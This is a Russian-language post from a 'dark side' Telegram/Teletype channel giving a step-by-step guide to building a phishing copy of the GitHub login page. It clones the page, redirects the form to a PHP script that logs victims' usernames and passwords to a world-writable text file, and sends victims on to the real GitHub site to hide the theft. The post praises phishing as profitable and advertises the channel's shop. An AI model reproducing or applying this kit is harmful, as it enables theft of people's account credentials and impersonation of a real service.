About Teletype
Join
@DARKSiDEiNViTE | Dark $ide - Твоя Тёмная сторона.
@exploit_dar
April 6, 2019

Свой фишинг за 5 минут {Гайд}

https://tele.click/darkside_team

Привет хацкер, сегодня поднимем свой фишинг из любого сайта, поехали!

Создание фейка делится на 2 этапа:

  1. Клонирование сайта
  2. Изменение кода и выгрузка на хостинг

Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инжерения.

Приступим к первому этапу

Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github.com/login

Для РИПа (клонирования) будем использовать сервис - WebParse

Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:

После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:

2 этап.

Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:

Меняем его на auth.php

На скрине параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base:

Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:

<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>

file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Теперь загружаем всё это дело на хостинг, а папке base даём права 777

Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен.com/base/ds_logs.txt

Название папки и имя .txt файла можно поменять в auth.php

Пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

header('Location: https://github.com/session');

После ввода логина и пароля, жертва переместится по ссылке github.com/session тем временем у нас:

На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блекджеком и сами знаете кем :)

Скачать фишинг-пример - LINK

Dark $ide - Твоя Тёмная Сторона

Наш чат - Dark Chat | D$

Наш магазин - Dark $tore

@DARKSiDEiNViTE | Dark $ide - Твоя Тёмная сторона.
April 6, 2019, 16:55
0 reactions
0 views